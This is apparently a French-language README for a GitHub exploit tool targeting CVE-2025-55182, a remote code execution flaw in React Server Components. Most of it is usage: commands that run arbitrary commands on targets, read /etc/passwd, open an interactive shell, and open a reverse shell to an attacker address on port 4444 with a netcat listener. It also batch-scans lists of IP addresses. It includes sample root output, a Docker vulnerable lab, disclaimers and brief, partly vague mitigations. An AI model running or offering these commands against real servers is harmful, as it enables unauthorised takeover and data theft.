Exploit basé sur Python pour CVE-2025-55182 (RCE React Server Components) avec shell interactif, shell inversé, analyse par lots et environnement vulnérable basé sur Docker pour les tests de sécurité autorisés.
⚠️ Avis juridique : Cet outil est destiné uniquement à la recherche en sécurité, aux tests d'intrusion autorisés et à des fins éducatives. Utiliser cet outil contre un système sans autorisation explicite est illégal et contraire à l'éthique.
CVE-2025-55182 est une vulnérabilité critique d'exécution de code à distance (RCE) dans React Server Components (RSC), permettant à un attaquant non authentifié d'exécuter du code arbitraire sur le serveur via une désérialisation malveillante de JavaScript.
| Attribut | Valeur |
|---|
| ID CVE | CVE-2025-55182 |
| Score CVSS | 9,8 (Critique) |
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction utilisateur | Aucune |
| Impact | Élevé (Confidentialité, Intégrité, Disponibilité) |
| Composant affecté | React Server Components (RSC) |
| Versions affectées | React 18.x - 19.x (builds spécifiques) |
| Date de divulgation | 3 décembre 2025 |
| Alias CVE | React2Shell |
Cause racine : React Server Components désérialise incorrectement les objets JavaScript fournis par l'utilisateur lors du traitement des charges utiles RSC, permettant à un attaquant d'injecter du code malveillant exécuté sur le serveur.
Vecteur d'attaque : Charge utile RSC malveillante dans une requête HTTP Impact : Exécution de code à distance sans authentification, prise de contrôle du serveur, fuite de données
# Cloner le dépôt
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# Installer les dépendances
pip install -r requirements.txt
# Installer les dépendances
pip install requests
# Exécuter une commande sur la cible vulnérable
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# Mode shell interactif
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# Commande personnalisée
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# Établir un shell inversé avec IP/port personnalisé
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# Scan par lots
python exploit/batch_scanner.py -f targets.txt
# Mode verbeux
python exploit/cve_2025_55182.py -u http://target.com -v
# User-Agent personnalisé
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
Accéder à l'application vulnérable : http://localhost:3000
Exécuter une seule commande sur le serveur vulnérable :
python exploit/cve_2025_55182.py -u http://target.com -c "id"
Sortie attendue :
[+] Détection de la vulnérabilité réussie : RCE React Server Components
[+] Commande exécutée : id
[+] Réponse :
uid=0(root) gid=0(root) groups=0(root)
Obtenir un shell interactif sur le serveur vulnérable :
python exploit/cve_2025_55182.py -u http://target.com --shell
Fonctionnalités :
Établir une connexion de shell inversé :
# Sur la machine de l'attaquant
nc -lvnp 4444
# Exécuter l'outil d'exploitation
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
Scanner plusieurs cibles pour la vulnérabilité :
# Créer un fichier de cibles
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# Exécuter le scanner par lots
python exploit/batch_scanner.py -f targets.txt
Mettre à jour React
npm install react@latest
# Mettre à jour vers la version corrigée
Bloquer les requêtes RSC
// Désactiver temporairement RSC
const config = {
enableRSC: false
}
Règles WAF
# Mettre en place l'environnement vulnérable
cd target && docker-compose up -d
# Tester la vulnérabilité
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# Exécuter la suite de tests
python tests/test_exploit.py
Cet outil démontre :
Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Important : Cet outil est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.
En utilisant cet outil, vous acceptez :
Si vous découvrez cette vulnérabilité dans des systèmes de production :
Signaler au fournisseur
Attribution CVE
Communauté de sécurité
Rappelez-vous : La recherche en sécurité doit toujours être éthique et légale. Utilisez vos compétences pour rendre Internet plus sûr ! 🛡️